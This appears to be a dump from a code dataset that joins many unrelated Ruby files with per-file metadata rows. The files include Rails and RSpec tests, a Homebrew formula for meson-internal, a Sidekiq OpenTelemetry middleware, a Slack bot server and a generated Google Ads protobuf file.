def test_before_validation_and_after_validation_callbacks_should_be_called_in_declared_order
d = DogWithTwoValidators.new
d.valid?
assert_equal ["before_validation_marker1", "before_validation_marker2"], d.history
end
def test_further_callbacks_should_not_be_called_if_before_validation_throws_abort
d = DogBeforeValidatorThrowingAbort.new
output = d.valid?
assert_equal [], d.history
assert_equal false, output
end
def test_further_callbacks_should_be_called_if_before_validation_returns_false
d = DogBeforeValidatorReturningFalse.new
output = d.valid?
assert_equal ["before_validation_marker2"], d.history
assert_equal true, output
end
def test_further_callbacks_should_be_called_if_after_validation_returns_false
d = DogAfterValidatorReturningFalse.new
d.valid?
assert_equal ["after_validation_marker"], d.history
end
def test_validation_test_should_be_done
d = DogWithMissingName.new
output = d.valid?
assert_equal ["before_validation_marker"], d.history
assert_equal false, output
end
end
| 35.449198 | 109 | 0.802383 |
4abf94b479aa062330bfd759593506676fcdde6f | 3,659 | require File.expand_path('../spec_helper', __FILE__)
module Danger
describe Danger::DangerCodeStyleValidation do
it 'should be a plugin' do
expect(Danger::DangerCodeStyleValidation.new(nil)).to be_a Danger::Plugin
end
describe 'with Dangerfile' do
before do
@dangerfile = testing_dangerfile
@my_plugin = @dangerfile.code_style_validation
end
it 'Reports code style violation as error' do
diff = File.read('spec/fixtures/violated_diff.diff')
expected_message = File.read('spec/fixtures/violated_diff_message.md')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check file_extensions: ['.h', '.m', '.mm', '.cpp']
expect(@dangerfile.status_report[:errors]).to eq([DangerCodeStyleValidation::VIOLATION_ERROR_MESSAGE])
expect(@dangerfile.status_report[:markdowns].map(&:message).join("\n")).to eq(expected_message)
end
it 'Does not report error when extension is excluded' do
diff = File.read('spec/fixtures/violated_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check validator: 'clang-format',
file_extensions: ['.h', '.c']
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Accepts a validator other than clang-format' do
diff = File.read('spec/fixtures/violated_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check validator: 'yapf',
file_extensions: ['.py']
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Does not report error when code not violated' do
diff = File.read('spec/fixtures/innocent_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Does not report error for different extension types of files' do
diff = File.read('spec/fixtures/ruby_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Does not report unexpected errors when there are only removals in the diff' do
diff = File.read('spec/fixtures/red_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Ignores files matching ignored patterns' do
diff = File.read('spec/fixtures/violated_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check file_extensions: ['.h', '.m'],
ignore_file_patterns: [%r{^spec/}]
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Allows single pattern instead of array' do
diff = File.read('spec/fixtures/violated_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check ignore_file_patterns: %r{^spec/}
expect(@dangerfile.status_report[:errors]).to eq([])
end
it 'Allows single file extension instead of array' do
diff = File.read('spec/fixtures/violated_diff.diff')
allow(@my_plugin.github).to receive(:pr_diff).and_return diff
@my_plugin.check file_extensions: '.m'
expect(@dangerfile.status_report[:errors]).to eq([DangerCodeStyleValidation::VIOLATION_ERROR_MESSAGE])
end
end
end
end
| 35.524272 | 110 | 0.657557 |
1cce5380bd0c918959b5f46c4a42df246c400d4f | 224 | require './config/environment'
if ActiveRecord::Migrator.needs_migration?
raise 'Migrations are pending. Run `rake db:migrate` to resolve the issue.'
end
run ApplicationController
use ItemsController
use UsersController
| 22.4 | 77 | 0.8125 |
ffb50896ef050ee14f2a398ff76219b8ade4fc77 | 165 | module Groupby
module Model
class CustomUrlParam < Serializable
# string @key
# string @value
attr_accessor :key, :value
end
end
end | 13.75 | 39 | 0.636364 |
bb926ce0bbc7e787de8aa783955f3556bc5ffc3e | 1,784 | class MesonInternal < Formula
include Language::Python::Virtualenv
desc "Fast and user friendly build system"
homepage "https://mesonbuild.com/"
url "https://github.com/mesonbuild/meson/releases/download/0.46.1/meson-0.46.1.tar.gz"
sha256 "19497a03e7e5b303d8d11f98789a79aba59b5ad4a81bd00f4d099be0212cee78"
license "Apache-2.0"
revision 1
bottle do
sha256 cellar: :any_skip_relocation, catalina: "2081b7b2d37614f170b2b55855d77bd2788922a02103da66f2d0d33952541a3f"
sha256 cellar: :any_skip_relocation, mojave: "c00f702a075153263b34ade26d43a9a3a98673b6b8d30ce7d17e36581b16f2bf"
sha256 cellar: :any_skip_relocation, high_sierra: "e5c4655a955250b17edc8fbd17a3bd56b5a99d1fc34db303f2bfa684a2c76167"
end
keg_only <<~EOS
this formula contains a heavily patched version of the meson build system and
is exclusively used internally by other formulae.
Users are advised to run `brew install meson` to install
the official meson build
EOS
depends_on "ninja"
depends_on "[email protected]"
# see https://github.com/mesonbuild/meson/pull/2577
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/a20d7df94112f93ea81f72ff3eacaa2d7e681053/meson-internal/meson-osx.patch?full_index=1"
sha256 "d8545f5ffbb4dcc58131f35a9a97188ecb522c6951574c616d0ad07495d68895"
end
def install
virtualenv_install_with_resources
end
test do
(testpath/"helloworld.c").write <<~EOS
      #include <stdio.h>

      int main() {
        puts("hi");
        return 0;
      }
EOS
(testpath/"meson.build").write <<~EOS
project('hello', 'c')
executable('hello', 'helloworld.c')
EOS
mkdir testpath/"build" do
system "#{bin}/meson", ".."
assert_predicate testpath/"build/build.ninja", :exist?
end
end
end
| 32.436364 | 153 | 0.740471 |
91b3e6059f0b7d22932cd4580f1fde37b92565ea | 206 | class PreferredView < ActiveRecord::Migration
def self.up
add_column :users, :preferred_view, :string, :default => :expanded
end
def self.down
remove_column :users, :preferred_view
end
end
| 20.6 | 70 | 0.728155 |
ac758a6c762f74e92d22fee2314701379166531f | 491 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Compute::Mgmt::V2020_06_01
module Models
#
# Defines values for ResourceIdentityType
#
module ResourceIdentityType
SystemAssigned = "SystemAssigned"
UserAssigned = "UserAssigned"
SystemAssignedUserAssigned = "SystemAssigned, UserAssigned"
None = "None"
end
end
end
| 25.842105 | 70 | 0.718941 |
6a4edf82cbe246288d3f936d568a0ff6f3f2fe97 | 851 | module Liquid
module Rails
class Railtie < ::Rails::Railtie
config.app_generators.template_engine :liquid
initializer 'liquid-rails.register_template_handler' do |app|
ActiveSupport.on_load(:action_view) do
ActionView::Template.register_template_handler(:liquid, Liquid::Rails::TemplateHandler)
end
end
initializer 'liquid-rails.include_partial' do |app|
template_path = ::Rails.root.join('app/views')
Liquid::Template.file_system = Liquid::Rails::FileSystem.new(template_path)
end
initializer 'liquid-rails.setup_drop' do |app|
[:active_record, :mongoid].each do |orm|
ActiveSupport.on_load orm do
Liquid::Rails.setup_drop self
end
end
end
def self.setup
yield self
end
end
end
end
| 27.451613 | 97 | 0.649824 |
6268321ccde5655d5209b73b30e974ea75950b7f | 91 | require 'rspec'
require 'simplecov'
SimpleCov.start
require 'nikto/version'
include Nikto
| 13 | 23 | 0.802198 |
6a6aeb897bc752a6e9ebf7e933cbd7466814c485 | 640 | class SessionsController < ApplicationController
before_action :require_no_user!, only: [:new, :create]
def new
@user = User.new
render :new
end
def create
@user = User.find_by_credentials(params[:user][:user_name], params[:user][:password])
if @user.nil?
@user = User.new(user_params)
render :new
else
login_user!(@user)
redirect_to cats_url
end
end
def destroy
current_user.reset_session_token! if current_user
session[:session_token] = nil
redirect_to cats_url
end
private
def user_params
params.require(:user).permit(:user_name, :password)
end
end | 20.645161 | 89 | 0.682813 |
916438a2827f07e43c888aa08dc66002c3fb9f43 | 281 | module Frontend
mattr_accessor :organisations_search_client
mattr_accessor :search_client
mattr_accessor :mapit_api
mattr_accessor :imminence_api
mattr_accessor :local_links_manager_api
mattr_accessor :govuk_website_root
mattr_accessor :local_transactions_config
end
| 28.1 | 45 | 0.864769 |
d5ae37bff524380c3a2428b107d0ed67aa3baa2f | 130 | require 'spree_core'
require 'spree_extension'
require 'spree_coinbase_commerce/engine'
require 'spree_coinbase_commerce/version'
| 26 | 41 | 0.861538 |
bbd69b732e5e6c4d147801afed875692659c1e98 | 468 | # Takes the pcgw_games_list.json file and outputs a tab-delimited file for mix'n'match.
require 'open-uri'
require 'json'
require 'cgi'
games_list = JSON.parse(File.read('pcgw_games_list.json'))
games_list.uniq! { |game| game['pcgw_id'].downcase }
game_array = []
games_list.each do |game|
game_array << "#{CGI.unescape(game['pcgw_id'])}\t#{game['title']}\tn/a"
end
File.open("pcgw_catalog.txt", "w+") do |f|
game_array.each { |element| f.puts(element) }
end
| 24.631579 | 87 | 0.702991 |
62734e5415539734714130d810842b5851c9fc40 | 65 | module Ruboty
module Ponpetter
VERSION = "0.0.1"
end
end
| 10.833333 | 21 | 0.661538 |
ffbb1cf94bcb6dd70376975e4d8001770c147f66 | 869 | # For more info, please refer to: https://www.inspec.io/docs/
# Get path to terraform state file from attribute of kitchen-terraform.
terraform_state = attribute "terraform_state", {}
# Control that validates the generated Terraform state file.
control "state_file" do
# Define how critical this control is.
impact 0.6
# The actual test case.
describe file("terraform.tfstate.d/kitchen-terraform-default-network/terraform.tfstate") do
file = File.read("terraform.tfstate.d/kitchen-terraform-default-network/terraform.tfstate")
# Get json object of terraform state file.
data_hash = JSON.parse(file)
modules = data_hash["modules"]
subject do modules[1]["resources"]["azurerm_virtual_network.vnet"]["type"] end
    # Validate the resource type recorded for the virtual network.
it "is valid" do is_expected.to match "azurerm_virtual_network" end
end
end | 37.782609 | 96 | 0.726122 |
6a2eb159467da3b77243f2c07821e3f88b85df5e | 2,352 | # frozen_string_literal: true
require 'database_cleaner'
require 'cucumber/rails/database/strategy'
require 'cucumber/rails/database/deletion_strategy'
require 'cucumber/rails/database/null_strategy'
require 'cucumber/rails/database/shared_connection_strategy'
require 'cucumber/rails/database/truncation_strategy'
require 'cucumber/rails/database'
describe Cucumber::Rails::Database do
let(:strategy) { described_class.instance_variable_get(:@strategy) }
context 'when using a valid pre-determined strategy' do
before { described_class.javascript_strategy = :truncation }
it 'forwards a `before_non_js` event to the selected strategy' do
expect(strategy).to receive(:before_non_js)
described_class.before_non_js
end
it 'forwards a `before_js` event to the selected strategy' do
expect(strategy).to receive(:before_js)
described_class.before_js
end
it 'raises an error on `before_js` if no DatabaseCleaner cleaners exist' do
allow(DatabaseCleaner).to receive(:cleaners).and_return({})
expect { described_class.before_js }
.to raise_error(/No DatabaseCleaner strategies found/)
end
end
context 'when using an invalid pre-determined strategy' do
it 'raises an error if you use a non-understood strategy' do
expect { described_class.javascript_strategy = :invalid }
.to raise_error(Cucumber::Rails::Database::InvalidStrategy)
end
end
context 'when using a valid custom strategy' do
let(:strategy_type) do
Class.new do
def before_js
# Anything
end
def before_non_js
# Likewise
end
end
end
before { described_class.javascript_strategy = strategy_type }
it 'forwards a `before_non_js` event to the strategy' do
expect(strategy).to receive(:before_non_js)
described_class.before_non_js
end
it 'forwards a `before_js` event to the strategy' do
expect(strategy).to receive(:before_js)
described_class.before_js
end
end
context 'when using an invalid custom strategy' do
let(:invalid_strategy) { Class.new }
it 'raises an error if the strategy does not have a valid interface' do
expect { described_class.javascript_strategy = invalid_strategy }
.to raise_error(ArgumentError)
end
end
end
| 29.037037 | 79 | 0.720238 |
4abad6b214ecd31c13366a091af20980757756e9 | 1,685 | # frozen_string_literal: true
# Copyright The OpenTelemetry Authors
#
# SPDX-License-Identifier: Apache-2.0
module OpenTelemetry
module Instrumentation
module Sidekiq
module Middlewares
module Client
# TracerMiddleware propagates context and instruments Sidekiq client
# by way of its middleware system
class TracerMiddleware
def call(_worker_class, job, _queue, _redis_pool) # rubocop:disable Metrics/AbcSize
attributes = {
'messaging.system' => 'sidekiq',
'messaging.sidekiq.job_class' => job['wrapped']&.to_s || job['class'],
'messaging.message_id' => job['jid'],
'messaging.destination' => job['queue'],
'messaging.destination_kind' => 'queue'
}
attributes['peer.service'] = config[:peer_service] if config[:peer_service]
span_name = case config[:span_naming]
when :job_class then "#{job['wrapped']&.to_s || job['class']} send"
else "#{job['queue']} send"
end
tracer.in_span(span_name, attributes: attributes, kind: :producer) do |span|
OpenTelemetry.propagation.inject(job)
span.add_event('created_at', timestamp: job['created_at'])
yield
end
end
private
def config
Sidekiq::Instrumentation.instance.config
end
def tracer
Sidekiq::Instrumentation.instance.tracer
end
end
end
end
end
end
end
| 32.403846 | 95 | 0.549555 |
d54e5af42055049767e40f76840948c9d0fb984d | 223 | class CreateArtists < ActiveRecord::Migration[4.2]
def change
create_table :artists do |t|
t.string :name
t.timestamps
end
change_table :events do |t|
t.integer :artist_id
end
end
end
| 17.153846 | 50 | 0.64574 |
e9d6f7613e1cc08675d04cde1ca1112c9c3e43ca | 281 | # frozen_string_literal: true
module SpreeMailchimpEcommerce
class UpdateProductJob < ApplicationJob
def perform(mailchimp_product)
return unless mailchimp_product
gibbon_store.products(mailchimp_product["id"]).update(body: mailchimp_product)
end
end
end
| 23.416667 | 84 | 0.782918 |
4a1023f911b2e77887adfbf0223e9e87c75358b4 | 116 | class AddStripeIdToUser < ActiveRecord::Migration
def change
add_column :users, :stripe_id, :string
end
end
| 19.333333 | 49 | 0.758621 |
034d6316a188c7d6721ee2494e98123d9ef95499 | 676 | module SlackArena
class Server < SlackRubyBotServer::Server
on :channel_joined do |client, data|
message = 'Welcome to Are.na! Please `/arena connect [channel]` to publish a channel here.'
logger.info "#{client.owner.name}: joined ##{data.channel['name']}."
client.say(channel: data.channel['id'], text: message)
end
on :user_change do |client, data|
user = User.where(team: client.owner, user_id: data.user.id).first
next unless user && user.user_name != data.user.name
logger.info "RENAME: #{user.user_id}, #{user.user_name} => #{data.user.name}"
user.update_attributes!(user_name: data.user.name)
end
end
end
| 37.555556 | 97 | 0.668639 |
6a651b382edc73134c27ed854319fb2b91e168d8 | 1,054 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v9/enums/interaction_type.proto
require 'google/api/annotations_pb'
require 'google/protobuf'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v9/enums/interaction_type.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v9.enums.InteractionTypeEnum" do
end
add_enum "google.ads.googleads.v9.enums.InteractionTypeEnum.InteractionType" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :CALLS, 8000
end
end
end
module Google
module Ads
module GoogleAds
module V9
module Enums
InteractionTypeEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v9.enums.InteractionTypeEnum").msgclass
InteractionTypeEnum::InteractionType = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v9.enums.InteractionTypeEnum.InteractionType").enummodule
end
end
end
end
end
| 34 | 185 | 0.746679 |